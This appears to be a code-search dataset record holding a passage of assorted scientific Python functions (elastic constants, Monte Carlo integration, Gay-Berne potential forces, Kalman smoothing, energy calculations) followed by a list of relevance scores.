0],\n [ 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5,-4, 1, 0, 0, 0],\n [ 0, 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5, 0,-4, 1, 0],\n [ 0, 0, 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5, 0,-4, 1]])\n \n sigma = np.array(self.__sigma[etacalc])\n \n ci = np.linalg.lstsq(Matrix,sigma)\n \n #-- Cubic structures ------------------------------------------------------------------------------\n if (LC == 'CI' or \\\n LC == 'CII'):\n \n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[3,3]=ci[0][2]\n C[1,1]=C[0,0]\n C[2,2]=C[0,0]\n C[0,2]=C[0,1]\n C[1,2]=C[0,1]\n C[4,4]=C[3,3]\n C[5,5]=C[3,3]\n \n #-- Hexagonal Structures --------------------------------------------------------------------------\n if (LC == 'HI' or \\\n LC == 'HII'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[2,2]=ci[0][3]\n C[3,3]=ci[0][4]\n C[1,1]=C[0,0]\n C[1,2]=C[0,2]\n C[4,4]=C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Rhombohedral I Structures ---------------------------------------------------------------------\n if (LC == 'RI'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,3]= ci[0][3]\n C[2,2]= ci[0][4]\n C[3,3]= ci[0][5]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,3]=-C[0,3]\n C[4,5]= C[0,3]\n C[4,4]= C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Rhombohedral II Structures --------------------------------------------------------------------\n if (LC == 'RII'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,3]= ci[0][3]\n C[0,4]= ci[0][4]\n C[2,2]= ci[0][5]\n C[3,3]= ci[0][6]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,3]=-C[0,3]\n C[4,5]= C[0,3]\n C[1,4]=-C[0,4]\n C[3,5]=-C[0,4]\n C[4,4]= C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Tetragonal I Structures -----------------------------------------------------------------------\n if (LC == 'TI'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[2,2]= ci[0][3]\n C[3,3]= ci[0][4]\n C[5,5]= ci[0][5]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[4,4]= C[3,3]\n \n #-- Tetragonal II Structures ----------------------------------------------------------------------\n if (LC == 'TII'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,5]= ci[0][3]\n C[2,2]= ci[0][4]\n C[3,3]= ci[0][5]\n C[5,5]= ci[0][6]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,5]=-C[0,5]\n C[4,4]= C[3,3]\n \n #-- Orthorhombic Structures -----------------------------------------------------------------------\n if (LC == 'O'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[1,1]=ci[0][3]\n C[1,2]=ci[0][4]\n C[2,2]=ci[0][5]\n C[3,3]=ci[0][6]\n C[4,4]=ci[0][7]\n C[5,5]=ci[0][8]\n \n #-- Monoclinic Structures -------------------------------------------------------------------------\n if (LC == 'M'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[0,5]=ci[0][3]\n C[1,1]=ci[0][4]\n C[1,2]=ci[0][5]\n C[1,5]=ci[0][6]\n C[2,2]=ci[0][7]\n C[2,5]=ci[0][8]\n C[3,3]=ci[0][9]\n C[3,4]=ci[0][10]\n C[4,4]=ci[0][11]\n C[5,5]=ci[0][12]\n \n #-- Triclinic Structures --------------------------------------------------------------------------\n if (LC == 'N'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[0,3]=ci[0][3]\n C[0,4]=ci[0][4]\n C[0,5]=ci[0][5]\n C[1,1]=ci[0][6]\n C[1,2]=ci[0][7]\n C[1,3]=ci[0][8]\n C[1,4]=ci[0][9]\n C[1,5]=ci[0][10]\n C[2,2]=ci[0][11]\n C[2,3]=ci[0][12]\n C[2,4]=ci[0][13]\n C[2,5]=ci[0][14]\n C[3,3]=ci[0][15]\n C[3,4]=ci[0][16]\n C[3,5]=ci[0][17]\n C[4,4]=ci[0][18]\n C[4,5]=ci[0][19]\n C[5,5]=ci[0][20]\n #--------------------------------------------------------------------------------------------------\n \n \n \n for i in range(5):\n for j in range(i+1,6):\n C[j,i] = C[i,j] \n #%%%--- Calculating the elastic moduli ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if self.__cod == 'espresso': C = -C/10.\n elif self.__cod in ['vasp','emto','exciting','wien']: C=C*self.__vToGPa/self.__V0#C = C/4.#C=C*self.__CONV/self.__V0#C = C/4.\n self.BV = (C[0,0]+C[1,1]+C[2,2]+2*(C[0,1]+C[0,2]+C[1,2]))/9\n self.GV = ((C[0,0]+C[1,1]+C[2,2])-(C[0,1]+C[0,2]+C[1,2])+3*(C[3,3]+C[4,4]+C[5,5]))/15\n self.EV = (9*self.BV*self.GV)/(3*self.BV+self.GV)\n self.nuV= (1.5*self.BV-self.GV)/(3*self.BV+self.GV)\n self.S = np.linalg.inv(C)\n self.BR = 1/(self.S[0,0]+self.S[1,1]+self.S[2,2]+2*(self.S[0,1]+self.S[0,2]+self.S[1,2]))\n self.GR =15/(4*(self.S[0,0]+self.S[1,1]+self.S[2,2])-4*(self.S[0,1]+self.S[0,2]+self.S[1,2])+3*(self.S[3,3]+self.S[4,4]+self.S[5,5]))\n self.ER = (9*self.BR*self.GR)/(3*self.BR+self.GR)\n self.nuR= (1.5*self.BR-self.GR)/(3*self.BR+self.GR)\n self.BH = 0.50*(self.BV+self.BR)\n self.GH = 0.50*(self.GV+self.GR)\n self.EH = (9.*self.BH*self.GH)/(3.*self.BH+self.GH)\n self.nuH= (1.5*self.BH-self.GH)/(3.*self.BH+self.GH)\n self.AVR= 100.*(self.GV-self.GR)/(self.GV+self.GR)\n #--------------------------------------------------------------------------------------------------------------------------------\n Cs.append(C)\n self.__C = Cs", "def __init__(self, temperature=298.0 * simtk.unit.kelvin, sigma=0.1 * simtk.unit.angstroms, timestep=1 * simtk.unit.femtoseconds):\n\n # Create a new Custom integrator.\n super(MetropolisMonteCarloIntegrator, self).__init__(timestep)\n\n # Compute the thermal energy.\n kT = kB * temperature\n\n #\n # Integrator initialization.\n #\n self.addGlobalVariable(\"naccept\", 0) # number accepted\n self.addGlobalVariable(\"ntrials\", 0) # number of Metropolization trials\n\n self.addGlobalVariable(\"kT\", kT) # thermal energy\n self.addPerDofVariable(\"sigma_x\", sigma) # perturbation size\n self.addPerDofVariable(\"sigma_v\", 0) # velocity distribution stddev for Maxwell-Boltzmann (set later)\n self.addPerDofVariable(\"xold\", 0) # old positions\n self.addGlobalVariable(\"Eold\", 0) # old energy\n self.addGlobalVariable(\"Enew\", 0) # new energy\n self.addGlobalVariable(\"accept\", 0) # accept or reject\n\n #\n # Context state update.\n #\n self.addUpdateContextState()\n\n #\n # Update velocities from Maxwell-Boltzmann distribution.\n #\n self.addComputePerDof(\"sigma_v\", \"sqrt(kT/m)\")\n self.addComputePerDof(\"v\", \"sigma_v*gaussian\")\n self.addConstrainVelocities()\n\n #\n # propagation steps\n #\n # Store old positions and energy.\n self.addComputePerDof(\"xold\", \"x\")\n self.addComputeGlobal(\"Eold\", \"energy\")\n # Gaussian particle displacements.\n self.addComputePerDof(\"x\", \"x + sigma_x*gaussian\")\n # Accept or reject with Metropolis criteria.\n self.addComputeGlobal(\"accept\", \"step(exp(-(energy-Eold)/kT) - uniform)\")\n self.addComputePerDof(\"x\", \"(1-accept)*xold + x*accept\")\n # Accumulate acceptance statistics.\n self.addComputeGlobal(\"naccept\", \"naccept + accept\")\n self.addComputeGlobal(\"ntrials\", \"ntrials + 1\")", "def ComputeEnergyConsumption(self):\r\n pass", "def kge_non_parametric(sim, obs, dim=\"time\"):\n cc = spearman_rank_correlation(sim, obs, dim=dim)\n cc.name = \"kge_np_spearman_rank_correlation_coef\"\n kwargs = dict(\n input_core_dims=[[dim], [dim]], dask=\"parallelized\", output_dtypes=[float]\n )\n alpha = xr.apply_ufunc(_fdc_alpha, sim, obs, **kwargs)\n alpha.name = \"kge_np_rel_var\"\n beta = sim.sum(dim=dim) / obs.sum(dim=dim)\n beta.name = \"kge_np_bias\"\n kge = 1 - np.sqrt((cc - 1) ** 2 + (alpha - 1) ** 2 + (beta - 1) ** 2)\n kge.name = \"kge_np\"\n ds_out = xr.merge([kge, cc, alpha, beta])\n return ds_out", "def energy(self):\n return self.mc.energy(self.chain)", "def E_Kalman(self):\n print(\"E step\", file=self.logfile)\n # Computes the estimated mu and R using an RTS smoother after a Kalman filtering\n\n self.P = self.P+1\n\n self.R[:] = 0\n self.mu[:] = 0\n\n F = np.eye(self.P, k=-1)\n F[0,:-1] = self.alpha_g\n Q = np.eye(self.P, 1)\n C = Q.transpose()\n\n # 1 : Forward pass\n mu_prio = np.zeros((self.P, self.L_h))\n R_prio = np.zeros((self.P, self.P, self.L_h))\n mu_post = np.zeros((self.P, self.L_h))\n R_post = np.zeros((self.P, self.P, self.L_h))\n\n # Init on u = 0\n R_prio[0,0,0] = R_prio[0,0,0]+self.la/self.e2[0]\n\n # Update\n residual = self.h[0] - mu_prio[0,0]\n residual_cov = R_prio[0,0,0] + self.sigma2\n K = R_prio[:,0,0]/residual_cov\n\n mu_post[:,0] = mu_prio[:, 0] + K*residual\n\n K_mat = np.eye(self.P)\n K_mat[:,0] = K_mat[:,0] - K\n R_post[:,:,0] = np.dot(K_mat,R_prio[:,:,0])\n\n rescovvec = np.zeros(self.L_h)\n\n for u in range(1,self.L_h):\n # Predict\n mu_prio[1:,u] = mu_post[:-1,u-1]\n mu_prio[0,u] = np.dot(self.alpha_g,mu_post[:-1,u-1])\n\n\n\n R_prio[1:,:,u] = R_post[:-1,:,u-1]\n R_prio[0,:,u] = np.dot(self.alpha_g, R_post[:-1,:,u-1])\n R_prio[:,1:,u] = R_prio[:,:-1,u]\n R_prio[:,0,u] = np.dot(self.alpha_g, R_prio[:,1:,u].transpose())\n\n R_prio[0,0,u] = R_prio[0,0,u]+self.la/self.e2[u]\n\n # Update\n residual = self.h[u] - mu_prio[0,u]#np.dot(C, mu_prio[:,u])\n residual_cov = R_prio[0,0,u] + self.sigma2\n rescovvec[u] = residual_cov\n\n K = R_prio[:,0,u]/residual_cov\n mu_post[:,u] = mu_prio[:, u] + K*residual\n\n\n R_post[:,:,u] = R_prio[:,:,u] - np.dot(K[:,np.newaxis], R_prio[0:1,:,u])\n\n\n\n # 2 : Backward pass\n mu_smooth = np.zeros((self.P, self.L_h))\n mu_smooth[:, -1] = mu_post[:, -1]\n self.mu[-1] = mu_smooth[0, -1]\n\n R_smooth = np.zeros((self.P, self.P, self.L_h))\n R_smooth[:,:,-1] = R_post[:,:,-1]\n self.R[-self.P:,-1] = np.flip(R_smooth[:,0, -1])\n self.R[-1,-self.P:] = np.flip(R_smooth[0,:, -1])\n\n\n for u in range(self.L_h-1, self.P-1, -1):\n J = R_post[:,:-1,u-1]\n J = np.concatenate([np.dot(self.alpha_g, J.transpose())[:,np.newaxis],J], axis=1)\n J = np.dot(J, np.linalg.inv(R_prio[:,:,u]))\n\n mu_smooth[:,u-1] = mu_post[:,u-1] + np.dot(J,mu_smooth[:,u] - mu_prio[:,u])\n self.mu[u-1] = mu_smooth[0, u-1]\n\n R_smooth[:,:,u-1] = R_post[:,:,u-1] + np.dot(np.dot(J,R_smooth[:,:,u] - R_prio[:,:,u]),J.transpose())\n\n\n if u > self.P:\n self.R[u-self.P:u, u-1] = np.flip(R_smooth[:,0,u-1])\n self.R[u-1,u-self.P:u] = np.flip(R_smooth[0,:,u-1])\n\n if u == self.P:\n self.R[u-self.P:u, u-self.P:u] = np.flip(R_smooth[:,:,u-1])\n\n\n\n self.mu[:self.P] = np.flip(mu_smooth[:,self.P-1])\n\n self.P = self.P-1\n\n # Propagate\n self._propagate_mu()\n self._propagate_R()", "def force ( r, e ):\n from math import isclose\n\n # Parameters of the Gay-Berne potential \n # \n # The key parameters are \n # mu, nu ................ the exponents \n # kappa and kappa' ....... the anisotropies \n # kappa is the ratio of intermolecular separations \n # sigma_e / sigma_s i.e. end-to-end / side-by-side \n # kappa' is the ratio of well depths \n # epsilon_s / epsilon_e i.e. side-by-side / end-to-end \n # The derived parameters are chi and chi' \n # chi = (kappa**2 - 1) / (kappa**2+1) \n # chi' = (z - 1) / (z + 1)\n # where z = (kappa') ** ( 1 / mu ) \n # \n # For convenience kappa' is spelt xappa, chi' is spelt xhi\n # We choose units such that sigma_s = 1.0 and epsilon_0 = 1.0\n # Two of the following three varieties should be commented out\n\n # Original Gay-Berne-deMiguel potential [J. Chem. Phys, 74, 3316; Mol. Phys. 74, 405 (1991)]\n mu, nu, kappa, xappa = 2, 1, 3.0, 5.0\n\n # # Luckhurst-Phippen potential [Liq. Cryst., 8, 451 (1990)]\n # mu, nu, kappa, xappa = 1, 2, 3.0, 5.0\n\n # # Berardi-Zannoni potential [J. Chem. Soc. Faraday Trans., 89, 4069 (1993)]\n # mu, nu, kappa, xappa = 1, 3, 3.0, 5.0\n\n # Derived parameters\n chi = (kappa**2 - 1.0) / (kappa**2+1.0)\n xhi = (xappa**(1.0/mu) - 1.0) / (xappa**(1.0/mu) + 1.0)\n\n # Cutoff distance; normally we would use a larger value\n r_cut = 4.0\n \n assert r.shape == (n,3), 'Incorrect shape of r'\n assert e.shape == (n,3), 'Incorrect shape of e'\n\n # Notation to match appendix\n i = 0\n j = 1\n\n ei = e[i,:]\n ej = e[j,:]\n assert isclose(np.sum(ei**2),1.0), 'Non-unit vector {} {} {}'.format(*ei)\n assert isclose(np.sum(ej**2),1.0), 'Non-unit vector {} {} {}'.format(*ej)\n\n rij = r[i,:] - r[j,:]\n rij_mag = np.sqrt( np.sum(rij**2) ) # Magnitude of separation vector\n sij = rij / rij_mag # Unit vector\n ci = np.dot( ei, sij )\n cj = np.dot( ej, sij )\n cij = np.dot( ei, ej )\n cp = ci + cj\n cm = ci - cj\n\n # Sigma formula\n cpchi = cp/(1.0+chi*cij)\n cmchi = cm/(1.0-chi*cij)\n sigma = 1.0/np.sqrt(1.0-0.5*chi*(cp*cpchi+cm*cmchi))\n\n # Epsilon formula\n eps1 = 1.0/np.sqrt(1.0-(chi*cij)**2) # Depends on chi, not xhi\n cpxhi = cp/(1.0+xhi*cij)\n cmxhi = cm/(1.0-xhi*cij)\n eps2 = 1.0-0.5*xhi*(cp*cpxhi+cm*cmxhi) # Depends on xhi\n epsilon = (eps1**nu) * (eps2**mu)\n\n # Potential at rij\n rho = rij_mag - sigma + 1.0\n rho6 = 1.0 / rho**6\n rho12 = rho6**2\n rhoterm = 4.0*(rho12 - rho6) # Needed for forces and torques\n drhoterm = -24.0 * (2.0 * rho12 - rho6) / rho # Needed for forces and torques\n pot = epsilon*rhoterm\n\n # Potential at r_cut\n rho = r_cut - sigma + 1.0\n rho6 = 1.0 / rho**6\n rho12 = rho6**2\n cutterm = 4.0*(rho12 - rho6) # Needed for cutoff forces and torques\n dcutterm = -24.0 * (2.0 * rho12 - rho6) / rho # Needed for cutoff forces and torques\n pot = pot - epsilon * cutterm\n\n # Derivatives of sigma\n prefac = 0.5*chi*sigma**3\n dsig_dci = prefac*(cpchi+cmchi)\n dsig_dcj = prefac*(cpchi-cmchi)\n prefac = prefac*(0.5*chi)\n dsig_dcij = -prefac*(cpchi**2-cmchi**2)\n\n # Derivatives of epsilon\n prefac = -mu*xhi*(eps1**nu)*eps2**(mu-1)\n deps_dci = prefac*(cpxhi+cmxhi)\n deps_dcj = prefac*(cpxhi-cmxhi)\n prefac = prefac*(0.5*xhi)\n deps_dcij = -prefac*(cpxhi**2-cmxhi**2) # From derivative of eps2\n deps_dcij = deps_dcij + nu*(chi**2)*(eps1**(nu+2))*(eps2**mu)*cij # From derivative of eps1\n\n # Derivatives of potential\n dpot_drij = epsilon * drhoterm\n dpot_dci = rhoterm * deps_dci - epsilon * drhoterm * dsig_dci\n dpot_dcj = rhoterm * deps_dcj - epsilon * drhoterm * dsig_dcj\n dpot_dcij = rhoterm * deps_dcij - epsilon * drhoterm * dsig_dcij\n\n # Standard formula for forces and torque gradients\n fij = -dpot_drij*sij - dpot_dci*(ei-ci*sij)/rij_mag - dpot_dcj*(ej-cj*sij)/rij_mag\n gi = dpot_dci*sij + dpot_dcij*ej\n gj = dpot_dcj*sij + dpot_dcij*ei\n\n # Derivatives of potential at cutoff\n dpot_drij = epsilon * dcutterm\n dpot_dci = cutterm * deps_dci - epsilon * dcutterm * dsig_dci\n dpot_dcj = cutterm * deps_dcj - epsilon * dcutterm * dsig_dcj\n dpot_dcij = cutterm * deps_dcij - epsilon * dcutterm * dsig_dcij\n\n # Standard formula for forces and torque gradients (without dpot_drij term)\n fij = fij + dpot_dci*(ei-ci*sij)/rij_mag + dpot_dcj*(ej-cj*sij)/rij_mag\n gi = gi - ( dpot_dci*sij + dpot_dcij*ej ) \n gj = gj - ( dpot_dcj*sij + dpot_dcij*ei ) \n\n # Final forces and torques\n f = np.empty_like(r)\n t = np.empty_like(r)\n f[i,:] = fij\n f[j,:] = -fij\n t[i,:] = -np.cross(ei,gi)\n t[j,:] = -np.cross(ej,gj)\n\n return pot, f, t", "def calc_gravitational_energy(self):\n\n star = self.star\n\n K, N = star.mesh_size\n mu = star.mu_coords\n r = star.r_coords\n\n def S1(j):\n return np.sum((mu[2::2] - mu[:-2:2]) * (star.rho[:-2:2, j] * star.Phi[:-2:2, j] +\n 4 * star.rho[1:-1:2, j] * star.Phi[1:-1:2, j] +\n star.rho[2::2, j] * star.Phi[2::2, j])) / 6\n\n W = 0\n\n for j in range(0, N - 2, 2):\n W += (r[j + 2] - r[j]) * (r[j]**2 * S1(j) +\n 4 * r[j + 1]**2 * S1(j + 1) +\n r[j + 2]**2 * S1(j + 2))\n\n return -1 / 3 * np.pi * W", "def DynamicsCo(x, t, T0, alpha, cost_co, cost_ch, K_co, K_ch, n, r):\n y=np.zeros([np.size(x)])\n D=np.zeros([2]) \n #define fitnss\n D[0]=dmax*x[0]**n/(K_co**n+x[0]**n) #cooperator\n D[1]=dmax*x[0]**n/(K_ch**n+x[0]**n) #cheater \n #degradation\n deg=fmax*x[1]/(x[1]+Kd) \n #ODE of eco-evo dynamics\n y[0]=alpha*T0-deg*x[0]-alpha*x[0] #dt/dt\n y[1]=x[1]*(r*(1-cost_co)*(1-x[1]-x[2])-D[0]-alpha)#d Co/dt\n y[2]=x[2]*(r*(1-cost_ch)*(1-x[1]-x[2])-D[1]-alpha) #d Ch/dt\n \n return y", "def energy(n):\n return (n * pi * hbar / (2 * a)) ** 2 / (2 * m)", "def temperature_energy():\n e = _si.e.value\n k_B = _si.k_B.value\n return Equivalency(\n [(si.K, si.eV, lambda x: x / (e / k_B), lambda x: x * (e / k_B))],\n \"temperature_energy\",\n )", "def overheadmodel(J=None, m=None, mt=None, r=None, gravity=9.81,\n counterg=False):\n\n mmat = np.diag([mt, J, m, m])\n\n # state: x = [s, beta, xd, zd].T\n\n amat = np.zeros((4, 4))\n bmat = np.array([[1., 0], [0, 1.], [0, 0], [0, 0]])\n cmat = np.array([[0, 0, 1, 0], [0, 0, 0, 1]])\n\n if counterg:\n rhs = np.array([[0, -m*gravity*r, 0, m*gravity]]).T\n else:\n rhs = np.array([[0, 0, 0, m*gravity]]).T\n\n def holoc(x=None):\n return (x[2] - x[0])**2 + x[3]**2 - (r*x[1])**2\n\n def holojaco(x):\n return 2*np.array([[-(x[2]-x[0]), -r**2*x[1], x[2]-x[0], x[3]]]).\\\n reshape((1, x.size))\n\n def holohess(x):\n return 2*np.array([[1, 0, -1, 0],\n [0, -r**2, 0, 0],\n [-1, 0, 1, 0],\n [0, 0, 0, 1]])\n\n ovhdcrn = dict(mmat=mmat, amat=amat, bmat=bmat, cmat=cmat,\n rhs=rhs, holoc=holoc, holojaco=holojaco, holohess=holohess)\n return ovhdcrn", "def BraggEnergy(ID,hkl,twotheta):\n ID=goodID(ID)\n d=dSpace(ID,hkl)\n l=2*d*sind(twotheta/2.0)\n E=lam2E(l)\n return E", "def _calc_energy( self, V_a, eos_d ):\n pass", "def energy(self):\n self.E = - np.sum(self.phi) + 0.5 * self.mass * np.sqrt((self.v_x ** 2 + self.v_y **2))", "def k1(self) -> float:\n return self.distortion_coefficients[0]", "def fit_full(self, K, epsilon=1e-3,power_ep=[1.,1.]):\r\n self.epsilon = epsilon\r\n self.eta, self.delta = power_ep\r\n\r\n #Initial values - Posterior distribution parameters: q(f|X,Y) = N(f|mu,Sigma)\r\n mu = np.zeros(self.num_data)\r\n Sigma = K.copy()\r\n\r\n \"\"\"\r\n Initial values - Cavity distribution parameters:\r\n q_(f|mu_,sigma2_) = Product{q_i(f|mu_i,sigma2_i)}\r\n sigma_ = 1./tau_\r\n mu_ = v_/tau_\r\n \"\"\"\r\n self.tau_ = np.empty(self.num_data,dtype=float)\r\n self.v_ = np.empty(self.num_data,dtype=float)\r\n\r\n #Initial values - Marginal moments\r\n z = np.empty(self.num_data,dtype=float)\r\n self.Z_hat = np.empty(self.num_data,dtype=float)\r\n phi = np.empty(self.num_data,dtype=float)\r\n mu_hat = np.empty(self.num_data,dtype=float)\r\n sigma2_hat = np.empty(self.num_data,dtype=float)\r\n\r\n #Approximation\r\n epsilon_np1 = self.epsilon + 1.\r\n epsilon_np2 = self.epsilon + 1.\r\n \tself.iterations = 0\r\n self.np1 = [self.tau_tilde.copy()]\r\n self.np2 = [self.v_tilde.copy()]\r\n while epsilon_np1 > self.epsilon or epsilon_np2 > self.epsilon:\r\n update_order = np.random.permutation(self.num_data)\r\n for i in update_order:\r\n #Cavity distribution parameters\r\n self.tau_[i] = 1./Sigma[i,i] - self.eta*self.tau_tilde[i]\r\n self.v_[i] = mu[i]/Sigma[i,i] - self.eta*self.v_tilde[i]\r\n #Marginal moments\r\n self.Z_hat[i], mu_hat[i], sigma2_hat[i] = self.noise_model.moments_match(self.data[i],self.tau_[i],self.v_[i])\r\n #Site parameters update\r\n Delta_tau = self.delta/self.eta*(1./sigma2_hat[i] - 1./Sigma[i,i])\r\n Delta_v = self.delta/self.eta*(mu_hat[i]/sigma2_hat[i] - mu[i]/Sigma[i,i])\r\n self.tau_tilde[i] += Delta_tau\r\n self.v_tilde[i] += Delta_v\r\n #Posterior distribution parameters update\r\n DSYR(Sigma,Sigma[:,i].copy(), -float(Delta_tau/(1.+ Delta_tau*Sigma[i,i])))\r\n mu = np.dot(Sigma,self.v_tilde)\r\n self.iterations += 1\r\n #Sigma recomptutation with Cholesky decompositon\r\n Sroot_tilde_K = np.sqrt(self.tau_tilde)[:,None]*K\r\n B = np.eye(self.num_data) + np.sqrt(self.tau_tilde)[None,:]*Sroot_tilde_K\r\n L = jitchol(B)\r\n V,info = dtrtrs(L,Sroot_tilde_K,lower=1)\r\n Sigma = K - np.dot(V.T,V)\r\n mu = np.dot(Sigma,self.v_tilde)\r\n epsilon_np1 = sum((self.tau_tilde-self.np1[-1])**2)/self.num_data\r\n epsilon_np2 = sum((self.v_tilde-self.np2[-1])**2)/self.num_data\r\n self.np1.append(self.tau_tilde.copy())\r\n self.np2.append(self.v_tilde.copy())\r\n\r\n return self._compute_GP_variables()", "def getEnergy(self):\n if not hasattr(self,\"energy\"):\n self.energy = self.calcEnergy()\n return self.energy" ]
[ "0.685864", "0.6753086", "0.66774917", "0.65416646", "0.64236945", "0.6406966", "0.6316658", "0.6298241", "0.6277267", "0.6244753", "0.62259036", "0.62029636", "0.61880386", "0.61798847", "0.6175505", "0.6172549", "0.6145199", "0.6102385", "0.6071389", "0.6060328", "0.6001661", "0.59687155", "0.59663796", "0.5964864", "0.5964864", "0.59619546", "0.5959173", "0.59552604", "0.5945635", "0.5900157", "0.58997095", "0.58884645", "0.58877724", "0.58876985", "0.58820033", "0.5867749", "0.5867373", "0.58642876", "0.5861941", "0.5853756", "0.5851462", "0.5844948", "0.58418965", "0.58386004", "0.5835454", "0.5834334", "0.5833078", "0.5829652", "0.5827671", "0.58030057", "0.5801439", "0.5801428", "0.57974946", "0.5796232", "0.5785133", "0.5767913", "0.57672346", "0.57490575", "0.57480866", "0.5745102", "0.57449925", "0.57438725", "0.5741803", "0.57416666", "0.5738659", "0.5730399", "0.5729311", "0.57264864", "0.5725891", "0.5725142", "0.569503", "0.5690015", "0.5686154", "0.56855226", "0.5670784", "0.56707084", "0.5665631", "0.56497127", "0.56412333", "0.56382626", "0.5636753", "0.56367004", "0.56324685", "0.56287897", "0.56259525", "0.56256247", "0.5616365", "0.56149375", "0.56080073", "0.5606281", "0.560437", "0.5601512", "0.5587399", "0.5577109", "0.55738956", "0.55720633", "0.5570471", "0.5568524", "0.55626845", "0.55615574" ]
0.6054048
20
Fetches prediction field from prediction byte array. After TensorRT inference, prediction data is saved in byte array and returned by object detection network. This byte array contains several pieces of data about prediction we call one such piece a prediction field. The prediction fields layout is described in TRT_PREDICTION_LAYOUT. This function, given prediction byte array returned by network, staring index of given prediction and field name of interest, returns prediction field data corresponding to given arguments.
def fetch_prediction_field(field_name, detection_out, pred_start_idx): return detection_out[pred_start_idx + TRT_PREDICTION_LAYOUT[field_name]]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_predict(path=MODEL_PATH, version=VERSION, namePredictor=DEFAULT_PREDICTOR):\n logging.info(\"trying to load {}\".format(path + namePredictor + version + '.npz'))\n return np.load(path + namePredictor + version + '.npz')['pred']", "async def predict(params: predict_text):\n tweet = params.text\n prediction = tf_model.predict(tweet)\n prediction_db = PredictionModel(\n text=tweet,\n label=prediction[\"label\"],\n score=prediction[\"score\"],\n time=prediction[\"elapsed_time\"],\n )\n db.session.add(prediction_db)\n db.session.commit()\n return prediction", "def predict_raw(data_gen, index, partition, model):\n\n if partition == 'validation':\n transcr = data_gen.texts_valid[index]\n audio_path = \"\"\n data_point=data_gen.features_valid[index].T\n elif partition == 'train':\n transcr = data_gen.texts[index]\n # audio_path = data_gen.train_audio_paths[index]\n # data_point = data_gen.normalize(data_gen.featurize(audio_path))\n audio_path=\"\"\n data_point=data_gen.features[index].T\n else:\n raise Exception('Invalid partition! Must be \"train\" or \"validation\"')\n \n prediction = model.predict(np.expand_dims(data_point, axis=0))\n return (audio_path,data_point,transcr,prediction)", "def get_fvlm_predict_fn(serving_batch_size):\n num_classes, text_dim = load_fvlm_gin_configs()\n predict_step = create_predict_step()\n anchor_boxes, image_info = generate_anchors_info()\n\n def predict_fn(params, input_dict):\n input_dict['labels'] = {\n 'detection': {\n 'anchor_boxes': anchor_boxes,\n 'image_info': image_info,\n }\n }\n output = predict_step(params, input_dict, jax.random.PRNGKey(0))\n output = output['detection']\n output.pop('rpn_score_outputs')\n output.pop('rpn_box_outputs')\n output.pop('class_outputs')\n output.pop('box_outputs')\n return output\n\n input_signatures = {\n 'image':\n tf.TensorSpec(\n shape=(serving_batch_size, _IMAGE_SIZE.value, _IMAGE_SIZE.value,\n 3),\n dtype=tf.bfloat16,\n name='image'),\n 'text':\n tf.TensorSpec(\n shape=(serving_batch_size, num_classes, text_dim),\n dtype=tf.float32,\n name='queries'),\n }\n return predict_fn, input_signatures", "def predict(predictor, inputs):\n predictor_type = type(predictor).__name__\n\n # Standard tensorflow predictor\n if predictor_type in [\"tf.estimator.predictor\", \"SavedModelPredictor\"]:\n return predictor(inputs)[\"top_k\"]\n\n # Python based endpoint\n elif predictor_type == \"sagemaker.tensorflow.model.TensorFlowPredictor\":\n prediction = predictor.predict(inputs)\n top_k = prediction[\"outputs\"][\"top_k\"]\n output_shape = [y[\"size\"] for y in top_k[\"tensor_shape\"][\"dim\"]]\n output_val = np.array(top_k[\"int_val\"]).reshape(*output_shape)\n return output_val\n\n # Tensorflow serving based endpoint\n elif predictor_type in [\"sagemaker.tensorflow.serving.Predictor\", \"Predictor\"]:\n prediction = predictor.predict(inputs)\n return np.array(prediction[\"predictions\"])\n else:\n print(\"Predict method failed. Supplied predictor type {} not supported.\".format(predictor_type))", "def predict(self):\n for src_p, pair in enumerate(self.pairs):\n dst_p = pair[1].argmax()\n dst_ind = pair[0][dst_p]\n\n self.vector_field.append(np.hstack([self.frame_0[src_p], self.frame_1[dst_ind]]))\n\n self.vector_field = np.vstack(self.vector_field)\n\n return self.vector_field", "def predict(self, testloader, field=None):\n model_name = str(field).lower()\n\n assert field == HOME or field == AWAY, 'ERROR - model predict: WRONG model name. Give \"home\" or \"away\"'\n\n preds = {}\n\n for i, model in enumerate(self.models):\n if (model_name == HOME):\n # logger.info('> Calling Home Network')\n field_net = model.model.home_network\n elif (model_name == AWAY):\n # logger.info('> Calling Away Network')\n field_net = model.model.away_network\n else:\n raise ValueError('Model - predict: Wrong model name')\n\n model_preds = []\n with torch.no_grad():\n\n for x in testloader:\n x = torch.Tensor(x).to(self.device)\n out = field_net(x)\n\n out = out.squeeze()\n\n model_preds.append(out.item())\n\n preds[i] = model_preds\n\n return preds[i]", "def predict(self, data, version='default'):\n return self.skil.api.transformarray(\n deployment_name=self.deployment.name,\n transform_name=self.model_name,\n 